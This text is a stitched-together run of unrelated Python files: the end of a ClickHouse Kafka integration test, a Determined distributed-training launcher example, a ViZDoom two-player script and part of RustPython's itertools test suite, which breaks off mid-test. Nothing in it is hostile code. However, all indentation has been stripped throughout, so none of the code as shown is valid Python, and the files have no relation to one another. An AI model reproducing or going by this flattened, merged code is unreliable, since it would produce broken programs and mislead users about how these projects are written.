kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
time.sleep(3)
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
@pytest.mark.timeout(180)
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
4_distributed.py
|
"""
Stage 4: Let's do all the same things, but across multiple workers.
Multi-slot tasks in Determined get the following features out of the box:
- batch scheduling
- IP address coordination between workers
- distributed communication primitives
- coordinated cross-worker preemption support
- checkpoint download sharing between workers on the same node
- filter logs by rank in the WebUI
"""
import logging
import pathlib
import queue
import subprocess
import sys
import threading
import time
import determined as det
def save_state(x, steps_completed, trial_id, checkpoint_directory):
with checkpoint_directory.joinpath("state").open("w") as f:
f.write(f"{x},{steps_completed},{trial_id}")
def load_state(trial_id, checkpoint_directory):
checkpoint_directory = pathlib.Path(checkpoint_directory)
with checkpoint_directory.joinpath("state").open("r") as f:
x, steps_completed, ckpt_trial_id = [int(field) for field in f.read().split(",")]
if ckpt_trial_id == trial_id:
return x, steps_completed
else:
return x, 0
def main(core_context, latest_checkpoint, trial_id, increment_by):
x = 0
starting_batch = 0
if latest_checkpoint is not None:
with core_context.checkpoint.restore_path(latest_checkpoint) as path:
x, starting_batch = load_state(trial_id, path)
batch = starting_batch
last_checkpoint_batch = None
for op in core_context.searcher.operations():
while batch < op.length:
# NEW: Increment by the sum of every worker's increment_by value.
# In reality, it is just increment_by*num_workers, but the point is
# to show how to use the communication primitives.
all_increment_bys = core_context.distributed.allgather(increment_by)
x += sum(all_increment_bys)
steps_completed = batch + 1
time.sleep(.1)
# NEW: some logs are easier to read if you only log from the chief.
if core_context.distributed.rank == 0:
logging.info(f"x is now {x}")
if steps_completed % 10 == 0:
# NEW: only the chief may report training metrics and progress,
# or upload checkpoints.
if core_context.distributed.rank == 0:
core_context.train.report_training_metrics(
steps_completed=steps_completed, metrics={"x": x}
)
op.report_progress(steps_completed)
checkpoint_metadata = {"steps_completed": steps_completed}
with core_context.checkpoint.store_path(
checkpoint_metadata
) as (checkpoint_directory, uuid):
save_state(x, steps_completed, trial_id, checkpoint_directory)
last_checkpoint_batch = steps_completed
if core_context.preempt.should_preempt():
return
batch += 1
# NEW: only the chief may report validation metrics and completed operations.
if core_context.distributed.rank == 0:
core_context.train.report_validation_metrics(
steps_completed=steps_completed, metrics={"x": x}
)
op.report_completed(x)
# NEW: again, only the chief may upload checkpoints.
if core_context.distributed.rank == 0 and last_checkpoint_batch != steps_completed:
checkpoint_metadata = {"steps_completed": steps_completed}
with core_context.checkpoint.store_path(checkpoint_metadata) as (path, uuid):
save_state(x, steps_completed, trial_id, path)
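# A framework-free stand-in (illustration only, not the Determined API) for the arithmetic of the
# allgather + sum pattern used in main() above: allgather() gives every worker the list of all
# workers' values in rank order, so summing it equals increment_by * num_workers.
def _allgather_sum_equivalent(increment_by, num_workers):
    all_increment_bys = [increment_by] * num_workers  # what each worker would receive
    return sum(all_increment_bys)                     # == increment_by * num_workers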
# NEW: Launch one process per slot. In many distributed training frameworks, like horovod,
# torch.distributed, or deepspeed, there is a launcher of some sort provided by the framework.
# This example implements a launcher from scratch using subprocess and threading.
def launcher_main(slots_per_node, num_nodes, cross_rank):
# Use subprocess to start one worker process per node.
procs = []
for local_rank in range(slots_per_node):
rank = cross_rank * slots_per_node + local_rank
cmd = [
# Use the determined.launch.wrap_rank to wrap the worker process.
# This ensures logs from each worker can be filtered by rank in the WebUI.
"python3",
"-m",
"determined.launch.wrap_rank",
str(rank),
"--",
# Re-invoke this script but as a worker.
"python3",
__file__,
"worker",
str(rank),
str(local_rank),
]
procs.append(subprocess.Popen(cmd))
# A good launcher normally waits for all workers to finish, but cleans up and exits
# nonzero immediately if any worker fails to prevent distributed training jobs from
    # hanging. One way to do this is by managing each worker process in a thread and sending
# exit codes over a Queue as workers complete.
q = queue.Queue()
def wait_for_worker(proc):
worker_exit = proc.wait()
q.put((proc, worker_exit))
threads = [threading.Thread(target=wait_for_worker, args=(proc,)) for proc in procs]
for t in threads:
t.start()
first_failed_exit = 0
for i in range(slots_per_node):
proc, worker_exit = q.get()
procs.remove(proc)
if worker_exit != 0 and first_failed_exit == 0:
# When the first worker crashes, preempt the others.
first_failed_exit = worker_exit
for proc in procs:
proc.kill()
for t in threads:
t.join()
return first_failed_exit
# NEW: every worker needs to create a DistributedContext to pass into core.init().
def worker_main(slots_per_node, num_nodes, cross_rank, chief_ip, rank, local_rank):
# In the absence of a distributed training framework that might define the
# rank/local_rank/cross_rank, you can derive them from the ClusterInfo API.
distributed = det.core.DistributedContext(
rank=rank,
size=num_nodes * slots_per_node,
local_rank=local_rank,
local_size=slots_per_node,
cross_rank=cross_rank,
cross_size=num_nodes,
chief_ip=chief_ip,
)
with det.core.init(distributed=distributed) as core_context:
main(
core_context=core_context,
latest_checkpoint=latest_checkpoint,
trial_id=trial_id,
increment_by=hparams["increment_by"],
)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO, format=det.LOG_FORMAT)
info = det.get_cluster_info()
assert info is not None, "this example only runs on-cluster"
latest_checkpoint = info.latest_checkpoint
trial_id = info.trial.trial_id
hparams = info.trial.hparams
# NEW: gather rank information from the ClusterInfo API.
slots_per_node = len(info.slot_ids)
num_nodes = len(info.container_addrs)
cross_rank = info.container_rank
chief_ip = info.container_addrs[0]
# NEW: This script is invoked both as a launcher-of-workers, and again as each worker.
if sys.argv[1] == "launcher":
# Usage: SCRIPT launcher
exitcode = launcher_main(slots_per_node, num_nodes, cross_rank)
sys.exit(exitcode)
if sys.argv[1] == "worker":
# Usage: SCRIPT worker $RANK $LOCAL_RANK
logging.info(f"worker starting")
rank = int(sys.argv[2])
local_rank = int(sys.argv[3])
exitcode = worker_main(
slots_per_node, num_nodes, cross_rank, chief_ip, rank, local_rank
)
sys.exit(exitcode)
raise ValueError(f"unrecognized first argument: {sys.argv[1]}")
|
multiple_instances.py
|
#!/usr/bin/env python
from __future__ import print_function
from random import choice
from vizdoom import *
# For a multiplayer game use processes (ZDoom's multiplayer sync mechanism prevents threads from working as expected).
from multiprocessing import Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Run this many episodes
episodes = 10
def player1():
game = DoomGame()
# game.load_config('../config/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-host 2 -deathmatch +timelimit 1.0 +sv_spawnfarthest 1")
game.add_game_args("+name Player1 +colorset 0")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
print("Episode #" + str(i + 1))
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Episode finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player2():
game = DoomGame()
# game.load_config('../config/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
# p1 = Thread(target = player1)
# p1.start()
if __name__ == '__main__':
p1 = Process(target=player1)
p1.start()
    player2()
    # Wait for the host process to finish before the script exits.
    p1.join()
|
test_itertools.py
|
import unittest
from test import support
from itertools import *
import weakref
from decimal import Decimal
from fractions import Fraction
import operator
import random
import copy
import pickle
from functools import reduce
import sys
import struct
import threading
maxsize = support.MAX_Py_ssize_t
minsize = -maxsize-1
def lzip(*args):
return list(zip(*args))
def onearg(x):
'Test function of one argument'
return 2*x
def errfunc(*args):
'Test function that raises an error'
raise ValueError
def gen3():
'Non-restartable source sequence'
for i in (0, 1, 2):
yield i
def isEven(x):
'Test predicate'
return x%2==0
def isOdd(x):
'Test predicate'
return x%2==1
def tupleize(*args):
return args
def irange(n):
for i in range(n):
yield i
class StopNow:
'Class emulating an empty iterable.'
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def take(n, seq):
'Convenience function for partially consuming a long or infinite iterable'
return list(islice(seq, n))
def prod(iterable):
return reduce(operator.mul, iterable, 1)
def fact(n):
'Factorial'
return prod(range(1, n+1))
# root level methods for pickling ability
def testR(r):
return r[0]
def testR2(r):
return r[2]
def underten(x):
return x<10
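# Helpers that round-trip an object through pickle at every supported protocol.
# Several tests iterate over these (together with copy/deepcopy) to check that
# itertools objects survive copying and pickling, including when part-consumed.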
picklecopiers = [lambda s, proto=proto: pickle.loads(pickle.dumps(s, proto))
for proto in range(pickle.HIGHEST_PROTOCOL + 1)]
class TestBasicOps(unittest.TestCase):
def pickletest(self, protocol, it, stop=4, take=1, compare=None):
"""Test that an iterator is the same after pickling, also when part-consumed"""
def expand(it, i=0):
# Recursively expand iterables, within sensible bounds
if i > 10:
raise RuntimeError("infinite recursion encountered")
if isinstance(it, str):
return it
try:
l = list(islice(it, stop))
except TypeError:
return it # can't expand it
return [expand(e, i+1) for e in l]
# Test the initial copy against the original
dump = pickle.dumps(it, protocol)
i2 = pickle.loads(dump)
self.assertEqual(type(it), type(i2))
a, b = expand(it), expand(i2)
self.assertEqual(a, b)
if compare:
c = expand(compare)
self.assertEqual(a, c)
# Take from the copy, and create another copy and compare them.
i3 = pickle.loads(dump)
took = 0
try:
for i in range(take):
next(i3)
took += 1
except StopIteration:
pass #in case there is less data than 'take'
dump = pickle.dumps(i3, protocol)
i4 = pickle.loads(dump)
a, b = expand(i3), expand(i4)
self.assertEqual(a, b)
if compare:
c = expand(compare[took:])
self.assertEqual(a, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate(self):
self.assertEqual(list(accumulate(range(10))), # one positional arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
self.assertEqual(list(accumulate(iterable=range(10))), # kw arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
for typ in int, complex, Decimal, Fraction: # multiple types
self.assertEqual(
list(accumulate(map(typ, range(10)))),
list(map(typ, [0, 1, 3, 6, 10, 15, 21, 28, 36, 45])))
self.assertEqual(list(accumulate('abc')), ['a', 'ab', 'abc']) # works with non-numeric
self.assertEqual(list(accumulate([])), []) # empty iterable
self.assertEqual(list(accumulate([7])), [7]) # iterable of length one
self.assertRaises(TypeError, accumulate, range(10), 5, 6) # too many args
self.assertRaises(TypeError, accumulate) # too few args
self.assertRaises(TypeError, accumulate, x=range(10)) # unexpected kwd arg
self.assertRaises(TypeError, list, accumulate([1, []])) # args that don't add
s = [2, 8, 9, 5, 7, 0, 3, 4, 1, 6]
self.assertEqual(list(accumulate(s, min)),
[2, 2, 2, 2, 2, 0, 0, 0, 0, 0])
self.assertEqual(list(accumulate(s, max)),
[2, 8, 9, 9, 9, 9, 9, 9, 9, 9])
self.assertEqual(list(accumulate(s, operator.mul)),
[2, 16, 144, 720, 5040, 0, 0, 0, 0, 0])
with self.assertRaises(TypeError):
list(accumulate(s, chr)) # unary-operation
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, accumulate(range(10))) # test pickling
self.pickletest(proto, accumulate(range(10), initial=7))
self.assertEqual(list(accumulate([10, 5, 1], initial=None)), [10, 15, 16])
self.assertEqual(list(accumulate([10, 5, 1], initial=100)), [100, 110, 115, 116])
self.assertEqual(list(accumulate([], initial=100)), [100])
with self.assertRaises(TypeError):
list(accumulate([10, 20], 100))
def test_chain(self):
def chain2(*iterables):
'Pure python version in the docs'
for it in iterables:
for element in it:
yield element
for c in (chain, chain2):
self.assertEqual(list(c('abc', 'def')), list('abcdef'))
self.assertEqual(list(c('abc')), list('abc'))
self.assertEqual(list(c('')), [])
self.assertEqual(take(4, c('abc', 'def')), list('abcd'))
self.assertRaises(TypeError, list,c(2, 3))
def test_chain_from_iterable(self):
self.assertEqual(list(chain.from_iterable(['abc', 'def'])), list('abcdef'))
self.assertEqual(list(chain.from_iterable(['abc'])), list('abc'))
self.assertEqual(list(chain.from_iterable([''])), [])
self.assertEqual(take(4, chain.from_iterable(['abc', 'def'])), list('abcd'))
self.assertRaises(TypeError, list, chain.from_iterable([2, 3]))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_chain_reducible(self):
for oper in [copy.deepcopy] + picklecopiers:
it = chain('abc', 'def')
self.assertEqual(list(oper(it)), list('abcdef'))
self.assertEqual(next(it), 'a')
self.assertEqual(list(oper(it)), list('bcdef'))
self.assertEqual(list(oper(chain(''))), [])
self.assertEqual(take(4, oper(chain('abc', 'def'))), list('abcd'))
self.assertRaises(TypeError, list, oper(chain(2, 3)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, chain('abc', 'def'), compare=list('abcdef'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_chain_setstate(self):
self.assertRaises(TypeError, chain().__setstate__, ())
self.assertRaises(TypeError, chain().__setstate__, [])
self.assertRaises(TypeError, chain().__setstate__, 0)
self.assertRaises(TypeError, chain().__setstate__, ([],))
self.assertRaises(TypeError, chain().__setstate__, (iter([]), []))
it = chain()
it.__setstate__((iter(['abc', 'def']),))
self.assertEqual(list(it), ['a', 'b', 'c', 'd', 'e', 'f'])
it = chain()
it.__setstate__((iter(['abc', 'def']), iter(['ghi'])))
self.assertEqual(list(it), ['ghi', 'a', 'b', 'c', 'd', 'e', 'f'])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_combinations(self):
self.assertRaises(TypeError, combinations, 'abc') # missing r argument
self.assertRaises(TypeError, combinations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, combinations, None) # pool is not iterable
self.assertRaises(ValueError, combinations, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(combinations('abc', 32))), []) # r > n
self.assertEqual(list(op(combinations('ABCD', 2))),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
testIntermediate = combinations('ABCD', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(op(combinations(range(4), 3))),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
testIntermediate = combinations(range(4), 3)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[(0,1,3), (0,2,3), (1,2,3)])
def combinations1(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = list(range(r))
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1
for j in range(i+1, r):
indices[j] = indices[j-1] + 1
yield tuple(pool[i] for i in indices)
def combinations2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in permutations(range(n), r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def combinations3(iterable, r):
'Pure python version from cwr()'
pool = tuple(iterable)
n = len(pool)
for indices in combinations_with_replacement(range(n), r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(combinations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(r) / fact(n-r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for c in result:
self.assertEqual(len(c), r) # r-length combinations
self.assertEqual(len(set(c)), r) # no duplicate elements
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(list(c),
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(combinations1(values, r))) # matches first pure python version
self.assertEqual(result, list(combinations2(values, r))) # matches second pure python version
self.assertEqual(result, list(combinations3(values, r))) # matches third pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, combinations(values, r)) # test pickling
@support.bigaddrspacetest
def test_combinations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations("AA", 2**29)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_tuple_reuse(self):
self.assertEqual(len(set(map(id, combinations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(combinations('abcde', 3))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_combinations_with_replacement(self):
cwr = combinations_with_replacement
self.assertRaises(TypeError, cwr, 'abc') # missing r argument
self.assertRaises(TypeError, cwr, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, cwr, None) # pool is not iterable
self.assertRaises(ValueError, cwr, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(cwr('ABC', 2))),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
testIntermediate = cwr('ABC', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def cwr1(iterable, r):
'Pure python version shown in the docs'
# number items returned: (n+r-1)! / r! / (n-1)! when n>0
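# e.g. for n=3 and r=2 this gives 4! / 2! / 2! = 6, matching the six pairs
# checked for cwr('ABC', 2) above.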
pool = tuple(iterable)
n = len(pool)
if not n and r:
return
indices = [0] * r
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != n - 1:
break
else:
return
indices[i:] = [indices[i] + 1] * (r - i)
yield tuple(pool[i] for i in indices)
def cwr2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in product(range(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def numcombs(n, r):
if not n:
return 0 if r else 1
return fact(n+r-1) / fact(r)/ fact(n-1)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(cwr(values, r))
self.assertEqual(len(result), numcombs(n, r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
regular_combs = list(combinations(values, r)) # compare to combs without replacement
if n == 0 or r <= 1:
self.assertEqual(result, regular_combs) # cases that should be identical
else:
self.assertTrue(set(result) >= set(regular_combs)) # rest should be supersets of regular combs
for c in result:
self.assertEqual(len(c), r) # r-length combinations
noruns = [k for k,v in groupby(c)] # combo without consecutive repeats
self.assertEqual(len(noruns), len(set(noruns))) # no repeats other than consecutive
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(noruns,
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(cwr1(values, r))) # matches first pure python version
self.assertEqual(result, list(cwr2(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cwr(values,r)) # test pickling
@support.bigaddrspacetest
def test_combinations_with_replacement_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations_with_replacement("AA", 2**30)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_with_replacement_tuple_reuse(self):
cwr = combinations_with_replacement
self.assertEqual(len(set(map(id, cwr('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(cwr('abcde', 3))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_permutations(self):
self.assertRaises(TypeError, permutations) # too few arguments
self.assertRaises(TypeError, permutations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, permutations, None) # pool is not iterable
self.assertRaises(ValueError, permutations, 'abc', -2) # r is negative
self.assertEqual(list(permutations('abc', 32)), []) # r > n
self.assertRaises(TypeError, permutations, 'abc', 's') # r is not an int or None
self.assertEqual(list(permutations(range(3), 2)),
[(0,1), (0,2), (1,0), (1,2), (2,0), (2,1)])
def permutations1(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = list(range(n))
cycles = list(range(n-r+1, n+1))[::-1]
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def permutations2(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(permutations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(n-r)) # right number of perms
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for p in result:
self.assertEqual(len(p), r) # r-length permutations
self.assertEqual(len(set(p)), r) # no duplicate elements
self.assertTrue(all(e in values for e in p)) # elements taken from input iterable
self.assertEqual(result, list(permutations1(values, r))) # matches first pure python version
self.assertEqual(result, list(permutations2(values, r))) # matches second pure python version
if r == n:
self.assertEqual(result, list(permutations(values, None))) # test r as None
self.assertEqual(result, list(permutations(values))) # test default r
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, permutations(values, r)) # test pickling
@support.bigaddrspacetest
def test_permutations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
permutations("A", 2**30)
@support.impl_detail("tuple reuse is specific to CPython")
def test_permutations_tuple_reuse(self):
self.assertEqual(len(set(map(id, permutations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(permutations('abcde', 3))))), 1)
def test_combinatorics(self):
# Test relationships between product(), permutations(),
# combinations() and combinations_with_replacement().
for n in range(6):
s = 'ABCDEFG'[:n]
for r in range(8):
prod = list(product(s, repeat=r))
cwr = list(combinations_with_replacement(s, r))
perm = list(permutations(s, r))
comb = list(combinations(s, r))
# Check size
self.assertEqual(len(prod), n**r)
self.assertEqual(len(cwr), (fact(n+r-1) / fact(r)/ fact(n-1)) if n else (not r))
self.assertEqual(len(perm), 0 if r>n else fact(n) / fact(n-r))
self.assertEqual(len(comb), 0 if r>n else fact(n) / fact(r) / fact(n-r))
# Check lexicographic order without repeated tuples
self.assertEqual(prod, sorted(set(prod)))
self.assertEqual(cwr, sorted(set(cwr)))
self.assertEqual(perm, sorted(set(perm)))
self.assertEqual(comb, sorted(set(comb)))
# Check interrelationships
self.assertEqual(cwr, [t for t in prod if sorted(t)==list(t)]) # cwr: prods which are sorted
self.assertEqual(perm, [t for t in prod if len(set(t))==r]) # perm: prods with no dups
self.assertEqual(comb, [t for t in perm if sorted(t)==list(t)]) # comb: perms that are sorted
self.assertEqual(comb, [t for t in cwr if len(set(t))==r]) # comb: cwrs without dups
self.assertEqual(comb, list(filter(set(cwr).__contains__, perm))) # comb: perm that is a cwr
self.assertEqual(comb, list(filter(set(perm).__contains__, cwr))) # comb: cwr that is a perm
self.assertEqual(comb, sorted(set(cwr) & set(perm))) # comb: both a cwr and a perm
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_compress(self):
self.assertEqual(list(compress(data='ABCDEF', selectors=[1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [0,0,0,0,0,0])), list(''))
self.assertEqual(list(compress('ABCDEF', [1,1,1,1,1,1])), list('ABCDEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1])), list('AC'))
self.assertEqual(list(compress('ABC', [0,1,1,1,1,1])), list('BC'))
n = 10000
data = chain.from_iterable(repeat(range(6), n))
selectors = chain.from_iterable(repeat((0, 1)))
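# The 0/1 selectors cycle against the repeated 0..5 data, so compress keeps the
# elements at odd offsets, i.e. 1, 3, 5, repeated n times.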
self.assertEqual(list(compress(data, selectors)), [1,3,5] * n)
self.assertRaises(TypeError, compress, None, range(6)) # 1st arg not iterable
self.assertRaises(TypeError, compress, range(6), None) # 2nd arg not iterable
self.assertRaises(TypeError, compress, range(6)) # too few args
self.assertRaises(TypeError, compress, range(6), None, None) # too many args
# check copy, deepcopy, pickle
for op in [lambda a:copy.copy(a), lambda a:copy.deepcopy(a)] + picklecopiers:
for data, selectors, result1, result2 in [
('ABCDEF', [1,0,1,0,1,1], 'ACEF', 'CEF'),
('ABCDEF', [0,0,0,0,0,0], '', ''),
('ABCDEF', [1,1,1,1,1,1], 'ABCDEF', 'BCDEF'),
('ABCDEF', [1,0,1], 'AC', 'C'),
('ABC', [0,1,1,1,1,1], 'BC', 'C'),
]:
self.assertEqual(list(op(compress(data=data, selectors=selectors))), list(result1))
self.assertEqual(list(op(compress(data, selectors))), list(result1))
testIntermediate = compress(data, selectors)
if result1:
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)), list(result2))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_count(self):
self.assertEqual(lzip('abc',count()), [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(lzip('abc',count(3)), [('a', 3), ('b', 4), ('c', 5)])
self.assertEqual(take(2, lzip('abc',count(3))), [('a', 3), ('b', 4)])
self.assertEqual(take(2, zip('abc',count(-1))), [('a', -1), ('b', 0)])
self.assertEqual(take(2, zip('abc',count(-3))), [('a', -3), ('b', -2)])
self.assertRaises(TypeError, count, 2, 3, 4)
self.assertRaises(TypeError, count, 'a')
self.assertEqual(take(10, count(maxsize-5)),
list(range(maxsize-5, maxsize+5)))
self.assertEqual(take(10, count(-maxsize-5)),
list(range(-maxsize-5, -maxsize+5)))
self.assertEqual(take(3, count(3.25)), [3.25, 4.25, 5.25])
self.assertEqual(take(3, count(3.25-4j)), [3.25-4j, 4.25-4j, 5.25-4j])
self.assertEqual(take(3, count(Decimal('1.1'))),
[Decimal('1.1'), Decimal('2.1'), Decimal('3.1')])
self.assertEqual(take(3, count(Fraction(2, 3))),
[Fraction(2, 3), Fraction(5, 3), Fraction(8, 3)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(BIGINT)), [BIGINT, BIGINT+1, BIGINT+2])
c = count(3)
self.assertEqual(repr(c), 'count(3)')
next(c)
self.assertEqual(repr(c), 'count(4)')
c = count(-9)
self.assertEqual(repr(c), 'count(-9)')
next(c)
self.assertEqual(next(c), -8)
self.assertEqual(repr(count(10.25)), 'count(10.25)')
self.assertEqual(repr(count(10.0)), 'count(10.0)')
self.assertEqual(type(next(count(10.0))), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i))
r2 = 'count(%r)'.__mod__(i)
self.assertEqual(r1, r2)
# check copy, deepcopy, pickle
for value in -3, 3, maxsize-5, maxsize+5:
c = count(value)
self.assertEqual(next(copy.copy(c)), value)
self.assertEqual(next(copy.deepcopy(c)), value)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(value))
# check proper internal error handling for large "step" sizes
count(1, maxsize+5); sys.exc_info()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_count_with_stride(self):
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(start=2,step=3)),
[('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(step=-1)),
[('a', 0), ('b', -1), ('c', -2)])
self.assertRaises(TypeError, count, 'a', 'b')
self.assertEqual(lzip('abc',count(2,0)), [('a', 2), ('b', 2), ('c', 2)])
self.assertEqual(lzip('abc',count(2,1)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(take(20, count(maxsize-15, 3)), take(20, range(maxsize-15, maxsize+100, 3)))
self.assertEqual(take(20, count(-maxsize-15, 3)), take(20, range(-maxsize-15,-maxsize+100, 3)))
self.assertEqual(take(3, count(10, maxsize+5)),
list(range(10, 10+3*(maxsize+5), maxsize+5)))
self.assertEqual(take(3, count(2, 1.25)), [2, 3.25, 4.5])
self.assertEqual(take(3, count(2, 3.25-4j)), [2, 5.25-4j, 8.5-8j])
self.assertEqual(take(3, count(Decimal('1.1'), Decimal('.1'))),
[Decimal('1.1'), Decimal('1.2'), Decimal('1.3')])
self.assertEqual(take(3, count(Fraction(2,3), Fraction(1,7))),
[Fraction(2,3), Fraction(17,21), Fraction(20,21)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(step=BIGINT)), [0, BIGINT, 2*BIGINT])
self.assertEqual(repr(take(3, count(10, 2.5))), repr([10, 12.5, 15.0]))
c = count(3, 5)
